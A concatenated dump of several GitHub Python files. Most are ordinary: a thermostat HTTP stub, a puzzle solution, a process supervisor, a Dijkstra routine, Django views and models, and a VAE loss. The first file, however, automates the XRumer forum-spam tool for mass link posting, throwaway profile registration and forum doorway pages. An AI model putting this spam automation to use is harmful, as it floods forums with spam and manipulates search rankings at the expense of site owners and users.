xrumerxdf import *\n\n'''The XrumerHelperBaseSpam and XrumerHelperBaseDoors classes have not been tested \nfor operation with pre-registration.'''\n\nclass XrumerHelper(object):\n    '''Abstract base class for the helpers'''\n    \n    def __init__(self, agent):\n        self.agent = agent\n        self.currentTask = self.agent.currentTask\n        self.linker = XrumerTopicLinker(self)\n        self.creationType = self.currentTask['creationType']\n        self.registerRun = self.currentTask['registerRun']\n        snippetsFolder = os.path.dirname(os.path.abspath(__file__)) + '/snippets'\n        keywordsFolder = os.path.join(self.agent.appFolder, 'Keywords')\n        self.keywordsFile = os.path.join(keywordsFolder, '%s.txt' % self.currentTask['niche'])\n        self.keywordsFileEsc = escape(self.keywordsFile)\n        self.snippetsFileEsc = escape(os.path.join(snippetsFolder, self.currentTask['snippetsFile']))\n        self.anchorsFileEsc = escape(self.linker.GetSpamAnchorsFile())\n        self.profilesFileEsc = escape(self.linker.GetProfilesFile())\n        self.randomizeNames = False\n    \n    def _WriteKeywords(self):\n        '''Write the 
keywords'''\n        with codecs.open(self.keywordsFile, 'w', 'cp1251') as fd:\n            fd.write('\\n'.join(self.currentTask['keywordsList']))\n    \n    def _CopyBase(self, sourceFileName, destFileName):\n        '''Copy the base'''\n        try:\n            shutil.copyfile(sourceFileName, destFileName)\n        except Exception as error:\n            print('Cannot copy base: %s' % error)\n    \n    def _DeleteBase(self, baseFileName):\n        '''Delete the base'''\n        if os.path.isfile(baseFileName): \n            try:\n                os.remove(baseFileName)\n            except Exception as error:\n                print('Cannot remove base: %s' % error)\n    \n    def _FilterBase(self, baseFileName):\n        '''Filter failed entries out of the base and count the links'''\n        try:\n            if kwk8.Kwk8Links(self.agent.logFails).Count() > 700:\n                kwk8.Kwk8Links(baseFileName).DeleteByFile(self.agent.logFails).Save(baseFileName)\n        except Exception as error:\n            print('Cannot filter base: %s' % error)\n        self.agent._CountLinks('baseLinksCount', baseFileName, 'base')\n    \n    def GetProjectName(self):\n        '''Project name'''\n        return 'ProjectX%d' % self.currentTask['id']\n    \n    def ActionOn(self):\n        '''Actions on start'''\n        pass\n    \n    def ActionOff(self):\n        '''Actions on finish'''\n        pass\n\nclass XrumerHelperBaseRaw(XrumerHelper):\n    '''Parse and check a new base'''\n    \n    def GetProjectName(self):\n        return 'ProjectN%d' % self.currentTask['id']\n    \n    def ActionOn(self):\n        '''Parse the base'''\n        parseTimeout = 90 * 60\n        if 'parseTimeout' in self.currentTask:\n            parseTimeout = int(self.currentTask['parseTimeout']) * 60\n        startTopics = self.currentTask['parseParams']\n        baseparser.Parse(self.agent.appFolder, startTopics, parseTimeout, self.currentTask['baseNumberMain'])\n        '''Project content'''\n        randomToken = ''.join(random.choice(string.letters) for _ in xrange(10))\n        projSubject = '#file_links[%s,1,N]' % (self.keywordsFileEsc)\n        projBody = '#file_links[%s,10,S] %s #file_links[%s,3,S] #file_links[%s,3,S] #file_links[%s,10,S]' % (self.snippetsFileEsc, randomToken, self.anchorsFileEsc, self.profilesFileEsc, self.snippetsFileEsc)\n        '''Write the keywords and delete the old bases'''\n        self._WriteKeywords()\n        self._DeleteBase(self.agent.baseMainRFile)\n        self._DeleteBase(self.agent.baseMainZFile)\n        self._DeleteBase(self.agent.baseMainEFile)\n        '''Create the settings'''\n        threadsCount = 110\n        self.agent._CreateSettings('none', '', 'post', 'LinksList', threadsCount, projSubject, projBody)\n    \n    def ActionOff(self):\n        '''Check the base'''\n        basechecker.Check(self.agent.appFolder, self.agent.projectName, self.currentTask['baseNumberMain'])\n        '''Count the links'''\n        self.agent._CountLinks('baseLinksCount', self.agent.baseMainFile, 'base')\n    \nclass XrumerHelperBaseSpam(XrumerHelper):\n    '''L, R and Z bases for topic spamming'''\n    \n    def GetProjectName(self):\n        return 'ProjectR%d' % self.currentTask['id']\n    \n    def ActionOn(self):\n        '''Project content'''\n        spamLinksList = escape(codecs.decode(' '.join(self.currentTask['spamLinksList']), 'cp1251'))\n        projSubject = '#file_links[%s,1,N]' % (self.keywordsFileEsc)\n        projBody = '#file_links[%s,10,S] %s #file_links[%s,3,S] #file_links[%s,3,S] #file_links[%s,10,S]' % (self.snippetsFileEsc, spamLinksList, self.anchorsFileEsc, self.profilesFileEsc, self.snippetsFileEsc)\n        '''Write the keywords, copy the source base to the target one and delete the existing R or Z base'''\n        self._WriteKeywords()\n        self._CopyBase(self.agent.baseSourceFile, self.agent.baseMainFile)\n        if self.currentTask['baseType'] == 'RLinksList':\n            self._DeleteBase(self.agent.baseMainRFile)\n        elif self.currentTask['baseType'] == 'ZLinksList': \n            
self._DeleteBase(self.agent.baseMainZFile)\n        else:\n            pass \n        '''Create the settings'''\n        threadsCount = 110\n        if self.creationType == 'post':\n            self.agent._CreateSettings('none', '', 'post', 'LinksList', threadsCount, projSubject, projBody)\n        elif self.creationType == 'reply':\n            self.agent._CreateSettings('none', '', 'reply', 'LinksList', threadsCount, projSubject, projBody)\n        elif self.creationType == 'reg + post' and self.registerRun:\n            self.agent._CreateSettings('register-only', '', 'post', 'LinksList', threadsCount, projSubject, projBody)\n        elif self.creationType == 'reg + post' and not self.registerRun:\n            self.agent._CreateSettings('from-registered', '', 'post', 'LinksList', threadsCount, projSubject, projBody)\n        elif self.creationType == 'reg + reply' and self.registerRun:\n            self.agent._CreateSettings('register-only', '', 'reply', 'LinksList', threadsCount, projSubject, projBody)\n        elif self.creationType == 'reg + reply' and not self.registerRun:\n            self.agent._CreateSettings('from-registered', '', 'reply', 'LinksList', threadsCount, projSubject, projBody)\n    \n    def ActionOff(self):\n        '''Copy the anchors and delete the base that was copied earlier'''\n        self.linker.AddSpamAnchorsFile()\n        if self.currentTask['baseType'] == 'RLinksList':\n            self._FilterBase(self.agent.baseMainRFile)\n            self._DeleteBase(self.agent.baseMainFile) \n        elif self.currentTask['baseType'] == 'ZLinksList':\n            self._FilterBase(self.agent.baseMainZFile)\n            self._DeleteBase(self.agent.baseMainFile) \n        else:\n            pass\n\nclass XrumerHelperSpamTask(XrumerHelper):\n    '''Task for spamming over the L, R and Z bases'''\n    \n    def __init__(self, agent):\n        '''Process the agent parameters'''\n        if 'baseZ' in agent.currentTask:\n            agent.currentTask['baseType'] = 'ZLinksList'\n            agent.currentTask['baseNumberMain'] = int(agent.currentTask['baseZ'])\n        if 'baseL' in agent.currentTask:\n            agent.currentTask['baseType'] = 'LinksList'\n            agent.currentTask['baseNumberMain'] = int(agent.currentTask['baseL'])\n        super(XrumerHelperSpamTask, self).__init__(agent)\n        # set after the base __init__, which resets randomizeNames to False\n        if 'randomizeNames' in agent.currentTask:\n            self.randomizeNames = True\n    \n    def GetProjectName(self):\n        return 'ProjectS%d' % self.currentTask['id']\n    \n    def ActionOn(self):\n        '''Project content'''\n        spamLinksList = escape(codecs.decode(' '.join(self.currentTask['spamLinksList']), 'cp1251'))\n        projSubject = '#file_links[%s,1,N]' % (self.keywordsFileEsc)\n        projBody = '#file_links[%s,10,S] %s #file_links[%s,3,S] #file_links[%s,3,S] #file_links[%s,10,S]' % (self.snippetsFileEsc, spamLinksList, self.anchorsFileEsc, self.profilesFileEsc, self.snippetsFileEsc)\n        '''Write the keywords'''\n        self._WriteKeywords()\n        '''Create the settings'''\n        if self.currentTask['baseType'] == 'RLinksList':\n            self.agent._CreateSettings('from-registered', '', 'reply', 'RLinksList', 160, projSubject, projBody)\n        elif self.currentTask['baseType'] == 'ZLinksList':\n            self.agent._CreateSettings('none', '', 'post', 'ZLinksList', 160, projSubject, projBody)\n        else:\n            self.agent._CreateSettings('none', '', 'post-reply', 'LinksList', 160, projSubject, projBody)\n    \n    def ActionOff(self):\n        '''Copy the anchors and filter failed entries out of the R base'''\n        self.linker.AddSpamAnchorsFile()\n        if self.currentTask['baseType'] == 'RLinksList':\n            self._FilterBase(self.agent.baseMainRFile)\n        elif self.currentTask['baseType'] == 'ZLinksList':\n            self.agent._CountLinks('baseLinksCount', self.agent.baseMainZFile, 'base')\n        else:\n            self.agent._CountLinks('baseLinksCount', self.agent.baseMainFile, 'base')\n\nclass XrumerHelperSpamProfileTask(XrumerHelper):\n    '''Task for 
profile spamming'''\n    \n    def __init__(self, agent):\n        '''Process the agent parameters'''\n        super(XrumerHelperSpamProfileTask, self).__init__(agent)\n        self.randomizeNames = True # profiles are always registered under random user names\n\n    def GetProjectName(self):\n        return 'ProjectP%d' % self.currentTask['id']\n    \n    def ActionOn(self):\n        '''Project content'''\n        projSubject = '#file_links[%s,1,N]' % (self.keywordsFileEsc)\n        projBody = r'#file_links[x:\foo.txt,1,N]'\n        projHomePage = self.currentTask['homePage']\n        projSignature = self.currentTask['signature']\n        '''Create the settings'''\n        self.agent._CreateSettings('register-only', 'edit-profile', 'post', 'LinksList', 110, projSubject, projBody, projHomePage, projSignature)\n        '''Delete the logs'''\n        self.agent._DeleteLog(self.agent.logAnchors)\n        self.agent._DeleteLog(self.agent.logProfiles)\n    \n    def ActionOff(self):\n        '''Filter failed entries out of the base and copy the profiles for later spamming'''\n        #self._FilterBase(self.agent.baseMainFile)\n        self.linker.AddProfilesFile()\n\nclass XrumerHelperBaseDoors(XrumerHelper):\n    '''Doorway pages on forums'''\n    \n    def GetProjectName(self):\n        return 'ProjectD%d' % self.currentTask['id']\n    \n    def ActionOn(self):\n        '''Project content'''\n        body = escape(self.currentTask['body'])\n        projSubject = '#file_links[%s,1,N]' % (self.keywordsFileEsc)\n        projBody = '%s #file_links[%s,10,L] #file_links[%s,3,L] #file_links[%s,3,L] #file_links[%s,10,S]' % (body, self.keywordsFileEsc, self.anchorsFileEsc, self.profilesFileEsc, self.snippetsFileEsc)\n        '''If this is the first pass'''\n        if not os.path.isfile(self.agent.baseMainRFile):\n            '''Write the keywords, copy the source base to the target one and delete the existing R base'''\n            self._WriteKeywords()\n            self._CopyBase(self.agent.baseSourceFile, self.agent.baseMainFile)\n            self._DeleteBase(self.agent.baseMainRFile) \n            '''Create the settings'''\n            threadsCount = 110\n            if self.creationType == 'post':\n                self.agent._CreateSettings('none', '', 'post', 'LinksList', threadsCount, projSubject, projBody)\n            elif self.creationType == 'reply':\n                self.agent._CreateSettings('none', '', 'reply', 'LinksList', threadsCount, projSubject, projBody)\n            elif self.creationType == 'reg + post' and self.registerRun:\n                self.agent._CreateSettings('register-only', '', 'post', 'LinksList', threadsCount, projSubject, projBody)\n            elif self.creationType == 'reg + post' and not self.registerRun:\n                self.agent._CreateSettings('from-registered', '', 'post', 'LinksList', threadsCount, projSubject, projBody)\n            elif self.creationType == 'reg + reply' and self.registerRun:\n                self.agent._CreateSettings('register-only', '', 'reply', 'LinksList', threadsCount, projSubject, projBody)\n            elif self.creationType == 'reg + reply' and not self.registerRun:\n                self.agent._CreateSettings('from-registered', '', 'reply', 'LinksList', threadsCount, projSubject, projBody)\n        else:\n            '''Write the keywords'''\n            self._WriteKeywords()\n            '''Create the settings'''\n            self.agent._CreateSettings('from-registered', '', 'reply', 'RLinksList', 160, projSubject, projBody)\n    \n    def ActionOff(self):\n        '''Copy the anchors, filter failed entries out of the R base and delete the base that was copied earlier'''\n        self.linker.AddDoorsAnchorsFile()\n        self._FilterBase(self.agent.baseMainRFile)\n        self._DeleteBase(self.agent.baseMainFile) \n","repo_name":"bizonix/doorscenter","sub_path":"doorsagents/xrumercls.py","file_name":"xrumercls.py","file_ext":"py","file_size_in_byte":14068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} 
+{"seq_id":"16997072919","text":"#\n# http://*\n#\n# The thermostat downloads release notes using a full URL. This\n# module replies to any full URL request with a simple text file\n# to replace the official release nodes.\n#\n\nimport logging\n\nfrom .httpobj import HttpRequest, HttpResponse, addUrl\n\n_LOGGER: logging.Logger = logging.getLogger(__package__)\n\ndef urlRelNodes(request):\n\n hostAndPath = request.pathDict['hostAndPath']\n\n _LOGGER.info(\"Fetch http://{}\".format(hostAndPath))\n\n bodyStr = \"Returned from python server\"\n\n response = HttpResponse.okResponse()\n\n response.headers.append((\"Cache-Control\", \"no-store,no-cache\"))\n response.headers.append((\"Pragma\", \"no-cache\"))\n response.addContentLengthHeader(len(bodyStr))\n response.addContentTypeHeader(\"text/plain\")\n response.addRequestContextHeader()\n response.headers.append((\"X-Content-CRC\", \"1278\"))\n response.headers.append((\"X-Current-Page\", \"http://{}\".format(hostAndPath)))\n # Cookie\n response.addDateHeader()\n\n response.body = bodyStr\n\n return response\n\n\n\naddUrl(\"http://(?P.+)$\", urlRelNodes)\n","repo_name":"nfriess/carrier_infinity","sub_path":"custom_components/carrier_infinity/urlrelnodes.py","file_name":"urlrelnodes.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"50"} +{"seq_id":"12684392326","text":"from lib.parse import parse_strings\nfrom collections import deque, defaultdict\n\ndef get_high_score(use_multiplier: bool = False) -> int:\n data = parse_strings(\"2018/day9/input.txt\")[0]\n d = data.split(\" \")\n players, final_marble = int(d[0]), int(d[6])\n scores, circle = defaultdict(int), deque([0])\n if use_multiplier:\n final_marble *= 100\n\n for marble in range(1, final_marble+1):\n elf = marble % players\n\n if marble % 23 == 0:\n circle.rotate(7)\n scores[elf] += marble + circle.pop()\n circle.rotate(-1)\n else:\n circle.rotate(-1)\n circle.append(marble)\n \n return max(scores.values())\n\nprint(get_high_score())\nprint(get_high_score(use_multiplier=True))\n\n","repo_name":"JoshHumpherey/advent-of-code","sub_path":"2018/day9/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"14969975003","text":"#!/usr/bin/env python3\n\nimport logging\nimport os\nimport sys\nimport time\nimport argparse\nimport subprocess\nimport datetime\nimport psutil\nimport schedule\n\n# Add some help and read parameters\nparser = argparse.ArgumentParser(description=\"\"\" Small supervising daemon \"\"\")\nparser.add_argument(\n \"--process\", default=\"sleep\", help=\"Process to monitor. Default: sleep\"\n)\nparser.add_argument(\n \"--command\", default=\"sleep 20 &\", help=\"Command to start daemon. Default: sleep 20\"\n)\nparser.add_argument(\n \"--interval\",\n type=int,\n default=3,\n help=\"Interval between checks in seconds. Default: 3\",\n)\nparser.add_argument(\n \"--retry\", type=int, default=3, help=\"Attempts to restart failed daemon. Default: 3\"\n)\nparser.add_argument(\n \"--wait\",\n type=int,\n default=3,\n help=\"Time to wait between restarts in seconds. Default: 3\",\n)\nparser.add_argument(\n \"--log\", default=\"no\", help=\"Enable logging. Options: yes/no. 
Default: no\"\n)\nargs = parser.parse_args()\n\n\n# Boolean: Check if process is running\ndef checkProcess(procName):\n for proc in psutil.process_iter():\n try:\n if procName in proc.name():\n return True\n except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):\n pass\n return False\n\n\n# Void: Writes log files if logging is enabled\ndef logger(message):\n log = args.log.lower()\n now = datetime.datetime.now()\n print(str(now.strftime(\"%d-%m-%Y %H:%M:%S\")) + \": \" + message)\n if log == \"yes\":\n logging.info(message)\n else:\n return\n\n\n# Void: Runs check and restarts service\ndef check_run():\n # Load variables from config\n proc_name = args.proccess\n attempt = args.retry\n start_command = args.command\n time_wait = args.wait\n # Init counter\n current_attempt = 0\n # Is daemon alive? Then ok\n if checkProcess(proc_name):\n logger(proc_name + \" is running. Waiting...\")\n # Oops, daemon is dead. Let's try to restart it\n else:\n logger(proc_name + \" is not running! restarting\")\n # Do not try so hard\n while current_attempt < attempt:\n logger(\"Restarting attempt: \" + str(current_attempt + 1))\n logger(\"Running: \" + start_command)\n # Wait between restarts\n if current_attempt > 0:\n time.sleep(time_wait)\n # Start it and get exit code\n p = subprocess.run(start_command, shell=True)\n logger(\"Start program exit code: \" + str(p.returncode))\n # Bump counter\n current_attempt += 1\n # If daemon started and have not died after successful start - happiness\n if p.returncode == 0 and checkProcess(proc_name):\n break\n # If not and we exhausted all attempts - sadness. requires restart to continue monitoring\n if current_attempt >= attempt:\n logger(\"Failed to restart service\")\n sys.exit()\n\n\ndef main() -> None:\n # Set path to log and pid file\n logfile = os.path.join(os.getcwd(), \"supervisor.log\")\n interval_sec = args.interval\n run_schedule = True\n # Configure logging\n logging.basicConfig(\n filename=logfile,\n level=logging.INFO,\n datefmt=\"%d-%m-%Y %H:%M:%S\",\n format=\"%(asctime)s: %(message)s\",\n )\n\n # Start schedule with configured interval\n schedule.every(interval_sec).seconds.do(check_run)\n # While we still try to revive daemon - run scheduler\n while run_schedule:\n schedule.run_pending()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"supaflyster/supervisord","sub_path":"supervisor-cli.py","file_name":"supervisor-cli.py","file_ext":"py","file_size_in_byte":3579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"16429531263","text":"def dijkstra(vertices, arestas, u, v):\r\n beta = {}\r\n phi = {}\r\n pi = {}\r\n\r\n for i in range(len(vertices)):\r\n beta[vertices[i]] = float('inf')\r\n phi[vertices[i]] = 0\r\n pi[vertices[i]] = 0\r\n\r\n verificacao = 0\r\n\r\n beta[u] = 0\r\n phi[u] = 1\r\n pi[u] = \"-\"\r\n w = u\r\n\r\n while (w != v):\r\n\r\n verificacao_2 = 0\r\n\r\n for j in arestas:\r\n if (j[0] == w):\r\n if phi[j[2]] == 0 and beta[j[2]] > beta[w] + 1:\r\n beta[j[2]] = beta[w] + 1\r\n pi[j[2]] = w\r\n verificacao_2 += 1\r\n\r\n min_beta = float('inf')\r\n\r\n for k in vertices:\r\n if phi[k] == 0 and beta[k] < float('inf'):\r\n if beta[k] < min_beta:\r\n min_beta = beta[k]\r\n\r\n if verificacao_2 == 0 and min_beta == float('inf'):\r\n verificacao += 1\r\n break\r\n\r\n for l in vertices:\r\n if beta[l] == min_beta and phi[l] == 0 and beta[l] < float('inf'):\r\n phi[l] = 1\r\n w = l\r\n break\r\n\r\n if verificacao == 1:\r\n return False\r\n\r\n 
else:\r\n        atual = v\r\n        lista = []\r\n\r\n        while atual != u:\r\n            for m in pi:\r\n                if m == atual:\r\n                    lista.append(atual)\r\n                    atual = pi[atual]\r\n                    break\r\n\r\n        lista.append(atual)\r\n\r\n        return len(lista) - 1, lista[::-1]\r\n\r\ndef DijkstraCarga(vertices, arestas, u, v, carga, recarga):\r\n\r\n    comeco = u\r\n    recarga.insert(0, u)\r\n    recarga.append(v)\r\n\r\n    possibilidades = {}\r\n\r\n    for i in range(len(recarga)):\r\n        for j in range(len(recarga)):\r\n\r\n            if u == recarga[j] or dijkstra(vertices, arestas, u, recarga[j]) == False:\r\n                continue\r\n\r\n            caminho = dijkstra(vertices, arestas, u, recarga[j])[0]\r\n\r\n            if caminho <= carga:\r\n                possibilidades[u + \"-\" + recarga[j]] = caminho\r\n        u = recarga[i]\r\n        if i > 0:\r\n            carga = 5\r\n\r\n    lista = dijkstra(recarga, possibilidades, comeco, v)\r\n\r\n    if lista == False:\r\n\r\n        return \"No path found!\"\r\n\r\n    caminho_2 = []\r\n    caminho_final = []\r\n\r\n    for i in range(len(lista[1])-1):\r\n        caminho_2.append(dijkstra(vertices, arestas, lista[1][i], lista[1][i+1])[1])\r\n\r\n    for i in range(len(caminho_2)):\r\n        for j in range(len(caminho_2[i])):\r\n            if (caminho_2[i][j] not in caminho_final):\r\n                caminho_final.append(caminho_2[i][j])\r\n\r\n    return caminho_final","repo_name":"ramonsilva186/Grafos","sub_path":"roteiro 7/dijkstraCarga.py","file_name":"dijkstraCarga.py","file_ext":"py","file_size_in_byte":2575,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"73538667354","text":"#!/usr/bin/env python\nimport pickle\n#from pylab import *\nimport matplotlib.pyplot as plt\nfrom pylab import transpose,where\nimport numpy as np\n\ndata = pickle.load(open(\"data/data.pkl\",'rb'))\nparam0,turn = transpose(data)\nymax2 = 275.0 / len(data)\n\ndef to_percentage(y,pos):\n    ret = round(y * 100.0, 2)\n    return str(ret) #+ '%'\n#str(round( ( y / float(len(data)) ) * 100.0, 2)) + '%'\n\nidx = [38, 35, 33, 31, 28] \n#clr = 'rgb'\n\nfig,ax_array = plt.subplots(len(idx),1)\nfig.set_figheight(15.0)\nfig.set_figwidth(9.0)\n\nc1 = tuple(np.array([255,165,0,125])/255.)\nc2 = tuple(np.array([0,128,0,200])/255.)\n\nfor (t,i,ax1) in zip(idx,range(len(idx)),ax_array):\n    \n    #add_subplot(3, 1, i + 1) # draw the (i+1)th bar plot\n    ax2 = ax1.twinx()\n    ax2.yaxis.set_major_formatter(plt.FuncFormatter(to_percentage))\n    #ax2.set_yticks([0,.02,.04,.06,.08])\n    #ax2.set_ylim([0,.08])\n\n    hist_data = param0[where(turn == t)[0]]\n    weights = np.ones_like(hist_data) #/ len(hist_data)\n    \n    print (275.0/len(hist_data)),ymax2,len(hist_data),len(data)\n    ax2.set_yticks(np.linspace(0.0, ymax2, 6)) #[0,.02,.04,.06,.08])\n    ax2.set_ylim([0, ymax2])\n\n#    ax2.hist(hist_data, bins=30, color=c1, weights=weights/len(hist_data))\n\n    ax1.hist(hist_data, bins=30, color=c2)\n    ax1.set_xlim(0.0, 1.0)\n    ax1.set_ylim(0, 275)\n    #ax1.set_yticks([\n    #ax2.set_title(\"P($p_0$ | $t_e$ = %d)\"%(t,))\n    ax1.text(.5, .88, \"P($p_0$ | $t_e$ = %d)\"%(t,),\n             horizontalalignment='center',\n             transform=ax1.transAxes,\n             fontsize=16)\n    if i == 2: ax1.set_ylabel(\"frequency\", fontsize=16)\n    if i == 2: ax2.set_ylabel(\"probability $\\\\times$ 100\", fontsize=16)\n\n    if i + 1 < len(idx): ax1.get_xaxis().set_visible(False)\n\nax1.set_xlabel(\"$p_0$ (Village-to-Chancellor buy ratio)\",fontsize=16)\nplt.savefig(\"3-row-dist.png\")\n\n","repo_name":"cronburg/150-ppl","sub_path":"proj/plotPaper.py","file_name":"plotPaper.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} 
+{"seq_id":"28631263657","text":"from django.db import models\n\n\nclass Fazenda(models.Model):\n nome = models.CharField(max_length=20, default='Sem nome')\n receita = models.IntegerField()\n gasto_previsto = models.IntegerField()\n data_receita_inicial = models.CharField(max_length=20)\n\n def __str__(self):\n return \"Nome: \" + self.nome + \" / Receita: \" + str(self.receita)\n \n def get_quantidade_total_materiais(self):\n quantidades = {\n \"madeira\": 0,\n \"pedra\": 0,\n \"minério de ferro\": 0,\n \"carvão\": 0\n }\n tarefas = self.tarefa_set.all()\n for tarefa in tarefas:\n materiais = tarefa.material_set.all()\n quantidades = Fazenda.soma_quantidade_total_materiais(quantidades, materiais)\n\n return quantidades\n \n def soma_quantidade_total_materiais(quantidades, materiais):\n for material in materiais:\n if material.tipo.lower() in quantidades:\n quantidades[material.tipo.lower()]+= material.quantidade\n return quantidades\n \n def get_gasto_previsto(self):\n tarefas = self.tarefa_set.all()\n soma = 0\n for tarefa in tarefas: \n if not tarefa.feito:\n soma += tarefa.custo\n\n return soma\n ","repo_name":"roselmamendes/stardew-planner","sub_path":"planner/models/fazenda.py","file_name":"fazenda.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"11435481699","text":"#from django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.renderers import JSONRenderer\nfrom rest_framework.parsers import JSONParser\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom games.models import Game\nfrom games.serializers import GameSerializer\n\n# Create your views here.\n# rest_framework.response.Response 로 대체 한다.\n'''\nclass JSONResponse(HttpResponse):\n def __init__(self, data, **kwargs):\n content = JSONRenderer().render(data)\n kwargs['content_type'] = 'application/json'\n super(JSONResponse, self).__init__(content, **kwargs)\n'''\n\n# 데커레이터\n@csrf_exempt\n@api_view(['GET', 'POST'])\ndef game_list(request):\n # 모든 게임을 나열\n if request.method == 'GET':\n games = Game.objects.all()\n games_serializer = GameSerializer(games, many=True)\n return Response(games_serializer.data)\n #return JSONResponse(games_serializer.data)\n # 새로운 게임을 생성\n elif request.method == 'POST':\n #game_data = JSONParser().parse(request)\n game_serializer = GameSerializer(data=request.data)\n if game_serializer.is_valid():\n game_serializer.save()\n return Response(game_serializer.data, status=status.HTTP_201_CREATED)\n #return JSONResponse(game_serializer.data, status=status.HTTP_201_CREATED)\n \n return Response(game_serializer.error, status=status.HTTP_400_BAD_REQUEST)\n #return JSONResponse(game_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n@csrf_exempt\n@api_view(['GET', 'PUT', 'POST'])\ndef game_detail(request, pk): # 기존 게임을 검색, 업데이트, 삭제한다. 
pk는 게임의 기본키 또는 식별자\n try:\n game = Game.objects.get(pk=pk)\n except Game.DoesNotExist:\n return Response(status=status.HTTP_404_NOT_FOUND)\n #return HttpResponse(status=status.HTTP_404_NOT_FOUND)\n # 게임 데이터 반환\n if request.method == 'GET':\n game_serializer = GameSerializer(game)\n return Response(game_serializer.data)\n #return JSONResponse(game_serializer.data)\n # request 요청에 포함된 json 데이터로 새 게임을 만들어 기존 게임을 대체한다.\n elif request.method == 'PUT':\n #game_data = JSONParser().parse(request)\n game_serializer = GameSerializer(game, data=request.data)\n if game_serializer.is_valid():\n game_serializer.save()\n return Response(game_serializer.data)\n #return JSONResponse(game_serializer.data)\n return Response(game_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n #return JSONResponse(game_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n \n elif request.method == 'DELETE':\n game.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n #return HttpResponse(status=status.HTTP_204_NO_CONTENT)","repo_name":"jundol-k/PythonREST","sub_path":"Django01/gamesapi/games/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3014,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"7747362581","text":"from tkinter import Frame, Label, Entry, StringVar, CENTER\n\nfrom src.utils.constants import Color, Misc\n\n\nclass HorseEntry:\n\n def __init__(\n self,\n parent_widget,\n entries: int,\n pady: int\n ):\n frame = Frame(parent_widget)\n\n label_style, entry_style = 'Times 16 bold', 'Times 18'\n self.entries, self.numbers = entries, []\n\n for i in range(1, entries + 1):\n Label(frame, text=Misc.ORDINALS[i], font=label_style) \\\n .grid(row=1, column=i, padx=20, pady=5)\n\n number = StringVar()\n entry = Entry(\n frame,\n textvariable=number,\n font=entry_style,\n fg=Color.RED,\n width=5,\n borderwidth=5,\n justify=CENTER,\n validate='key',\n )\n entry.configure(vcmd=(entry.register(self.check_digit), '%d', '%P'))\n entry.grid(row=2, column=i, padx=20, pady=5)\n self.numbers.append(number)\n\n frame.pack(pady=pady)\n\n def set_values(self, values: [int]):\n if len(values) <= self.entries:\n for i in range(len(values)):\n self.numbers[i].set(values[i])\n\n def get_values(self) -> [int]:\n strings = [n.get() for n in self.numbers]\n numbers = []\n\n for s in strings:\n try:\n n = int(s)\n if (0 < n < 15) and (n not in numbers):\n numbers.append(n)\n except:\n pass\n\n return numbers\n\n def clear(self):\n for number in self.numbers:\n number.set('')\n\n @staticmethod\n def check_digit(action_type: str, input_text: str):\n # validate only on insertion\n if action_type == '1':\n return input_text.isdigit()\n\n return True\n","repo_name":"lethal-weapon/the-tipper","sub_path":"src/ui/horse_entry.py","file_name":"horse_entry.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"29840386497","text":"from __future__ import division\nfrom __future__ import print_function\nfrom __future__ import absolute_import\n\nimport os\nimport sys\nimport shutil\nimport numpy as np\nfrom tqdm import tqdm\nfrom itertools import combinations\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom torchvision import transforms\n\nfrom model import MVAE\n\nsys.path.append('../celeba')\nfrom datasets import N_ATTRS\nfrom datasets import 
CelebAttributes\n\n\ndef elbo_loss(recon, data, mu, logvar, lambda_image=1.0, \n lambda_attrs=1.0, annealing_factor=1.):\n \"\"\"Compute the ELBO for an arbitrary number of data modalities.\n\n @param recon: list of torch.Tensors/Variables\n Contains one for each modality.\n @param data: list of torch.Tensors/Variables\n Size much agree with recon.\n @param mu: Torch.Tensor\n Mean of the variational distribution.\n @param logvar: Torch.Tensor\n Log variance for variational distribution.\n @param lambda_image: float [default: 1.0]\n weight for image BCE\n @param lambda_attr: float [default: 1.0]\n weight for attribute BCE\n @param annealing_factor: float [default: 1]\n Beta - how much to weight the KL regularizer.\n \"\"\"\n assert len(recon) == len(data), \"must supply ground truth for every modality.\"\n n_modalities = len(recon)\n batch_size = mu.size(0)\n\n BCE = 0 # reconstruction cost\n for ix in xrange(n_modalities):\n # dimensionality > 1 implies an image\n if len(recon[ix].size()) > 1:\n recon_ix = recon[ix].view(batch_size, -1)\n data_ix = data[ix].view(batch_size, -1)\n BCE += lambda_image * torch.sum(binary_cross_entropy_with_logits(recon_ix, data_ix), dim=1)\n else: # this is for an attribute\n BCE += lambda_attrs * binary_cross_entropy_with_logits(recon[ix], data[ix])\n KLD = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp(), dim=1)\n ELBO = torch.mean(BCE + annealing_factor * KLD)\n return ELBO\n\n\ndef binary_cross_entropy_with_logits(input, target):\n \"\"\"Sigmoid Activation + Binary Cross Entropy\n\n @param input: torch.Tensor (size N)\n @param target: torch.Tensor (size N)\n @return loss: torch.Tensor (size N)\n \"\"\"\n if not (target.size() == input.size()):\n raise 